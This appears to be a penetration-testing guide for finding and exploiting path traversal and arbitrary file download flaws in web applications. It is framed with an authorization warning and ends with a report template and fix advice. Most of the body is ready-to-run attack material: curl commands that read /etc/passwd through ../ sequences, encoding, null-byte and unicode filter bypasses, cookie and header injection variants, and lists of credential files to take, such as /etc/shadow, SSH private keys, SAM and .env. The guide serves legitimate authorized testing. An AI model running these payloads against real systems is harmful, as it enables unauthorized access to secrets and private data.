0X6C7879/exploit-file-download

Arbitrary File Download Detection & Exploitation

Authorization Warning

DANGER: File download vulnerability testing can expose sensitive system files and user data. Always ensure you have:

• Written permission from the target system owner
• Isolated testing environment
• Defined scope of testing
• Legal compliance with local regulations

Never test file download vulnerabilities on production systems without authorization.

---

Prerequisites

Required Tools

# Python 3 with requests library
pip install requests

# Optional: curl for manual testing
# Built-in on most systems

Optional Tools

# Burp Suite for manual testing
# OWASP ZAP for automated scanning
# ffuf for parameter fuzzing

---

Quick Start

Basic Path Traversal Test

# Manual test with curl
curl "https://target.com/download?file=../../../etc/passwd"

# Using the automated tester
python scripts/file_download_tester.py -u "https://target.com/download?file=document.pdf"

Sensitive File Scanner

# Scan for sensitive files after confirming vulnerability
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

---

Common Scenarios

1. Basic Path Traversal Testing

Test for basic directory traversal vulnerabilities:

# Manual testing
curl "https://target.com/download?file=../../../etc/passwd"
curl "https://target.com/download?file=....//....//etc/passwd"

# Automated testing
python scripts/file_download_tester.py -u "https://target.com/download?file=test.pdf"

What to check:

• Does the parameter accept ../ sequences?
• Can you access files outside the intended directory?
• What is the response when accessing system files?

Common payload patterns:

../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini

---

2. URL Encoded Bypass

When basic traversal is blocked, try URL encoding:

# Single URL encoding
curl "https://target.com/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double URL encoding
curl "https://target.com/download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"

Encoding variations: | Type | Payload | |------|---------| | URL encoded | %2e%2e%2f | | Double encoded | %252e%252e%252f | | Mixed | ..%2f..%2f |

---

3. Null Byte Injection

When extension validation exists:

# Null byte to truncate extension check
curl "https://target.com/download?file=../../../etc/passwd%00.jpg"
curl "https://target.com/download?file=../../../etc/passwd%00.png"

Works against:

• Simple extension validation
• Some path sanitization filters

---

4. Unicode/Double Write Bypass

When standard payloads are filtered:

# Unicode encoding
curl "https://target.com/download?file=..%c0%af..%c0%af..%c0%afetc/passwd"

# Double write (....//)
curl "https://target.com/download?file=....//....//....//etc/passwd"

# Mixed separators
curl "https://target.com/download?file=..%5c..%5c..%5cetc/passwd"

---

5. Sensitive File Discovery

After confirming vulnerability, discover sensitive files:

# Linux targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

# Windows targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os windows

# Custom file list
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --wordlist custom_files.txt

High-value targets (Linux):

/etc/passwd          - User accounts
/etc/shadow          - Password hashes (requires root)
/etc/hosts           - Host mappings
/proc/self/environ   - Environment variables
/var/log/apache2/access.log - Access logs
/home/user/.ssh/id_rsa - SSH private keys
/var/www/html/config.php - Web app configs

High-value targets (Windows):

C:\Windows\win.ini           - Windows configuration
C:\Windows\System32\config\SAM - User accounts
C:\inetpub\wwwroot\web.config - IIS configuration
C:\Users\Administrator\.ssh\id_rsa - SSH keys

---

6. Application Config Discovery

Target web application configuration files:

# Common web app configs
../../../var/www/html/config.php
../../../var/www/html/wp-config.php
../../../app/config/database.yml
../../../.env
../../../web.config

Framework-specific paths: | Framework | Config Path | |-----------|-------------| | WordPress | wp-config.php | | Laravel | .env | | Django | settings.py | | ASP.NET | web.config | | Spring | application.properties |

---

7. POST Request Testing

Test POST parameters for file download:

# Save request to file
cat > request.txt << 'EOF'
POST /download HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

file=document.pdf
EOF

# Test with curl
curl -X POST "https://target.com/download" -d "file=../../../etc/passwd"

---

8. Cookie/Header Testing

Test non-parameter injection points:

# Cookie parameter
curl "https://target.com/download" --cookie "filename=../../../etc/passwd"

# Custom header
curl "https://target.com/download" -H "X-File-Path: ../../../etc/passwd"

# Referer header
curl "https://target.com/download" -H "Referer: https://target.com/?file=../../../etc/passwd"

---

Tool Selection Guide

| Scenario | Tool | Command | |----------|------|---------| | Quick manual test | curl | curl "URL?file=../../../etc/passwd" | | Automated scanning | file_download_tester.py | python scripts/file_download_tester.py -u URL | | Sensitive file scan | sensitive_file_scanner.py | python scripts/sensitive_file_scanner.py -u URL --os linux | | Parameter fuzzing | ffuf | ffuf -u "URL?file=FUZZ" -w wordlist.txt | | Custom payload test | curl | curl "URL?file=$(cat payload.txt)" |

---

Testing Checklist

Discovery Phase

• [ ] Identify all download endpoints (URL params, forms, API endpoints)
• [ ] Test basic path traversal (../)
• [ ] Check response headers for file type information

Bypass Testing

• [ ] URL encoding (%2e%2e%2f)
• [ ] Double URL encoding (%252e%252e%252f)
• [ ] Null byte injection (%00)
• [ ] Unicode encoding (%c0%af)
• [ ] Double write (....//)
• [ ] Mixed separators (..\ on Windows)
• [ ] Path truncation

Sensitive File Testing

• [ ] Linux system files (/etc/passwd, /etc/shadow)
• [ ] Windows system files (win.ini, SAM)
• [ ] Application configs (.env, config.php)
• [ ] SSH keys (id_rsa, authorized_keys)
• [ ] Log files (access.log, error.log)
• [ ] Database files

Post-Exploitation

• [ ] Document all accessible files
• [ ] Identify sensitive data exposed
• [ ] Report severity based on data sensitivity

---

Resources

Scripts

• scripts/file_download_tester.py - Automated vulnerability detection
• scripts/sensitive_file_scanner.py - Sensitive file enumeration

Reference Documentation

• references/bypass_techniques.md - Detailed bypass methods
• references/sensitive_files.md - Comprehensive file lists

Assets/Wordlists

• assets/traversal_payloads.txt - Path traversal payloads
• assets/linux_sensitive_files.txt - Linux sensitive file paths
• assets/windows_sensitive_files.txt - Windows sensitive file paths

External Resources

• OWASP Path Traversal
• PortSwigger File Path Traversal
• PayloadsAllTheThings - Directory Traversal

---

Reporting Format

When reporting file download vulnerabilities, include:

╔═══════════════════════════════════════════════════════╗
║         File Download Vulnerability Report            ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/download                   ║
║ Type: Path Traversal                                  ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: file
Payload: ../../../etc/passwd

Proof of Concept:
curl "https://target.com/download?file=../../../etc/passwd"

Files Confirmed Accessible:
- /etc/passwd (user accounts)
- /etc/hosts (network config)
- /var/www/html/config.php (database credentials)

Impact:
- Access to sensitive system files
- Exposure of database credentials
- Potential for further exploitation

Recommendations:
- Implement strict path validation
- Use allowlist for permitted files
- Sanitize user input for path characters
- Use chroot or container isolation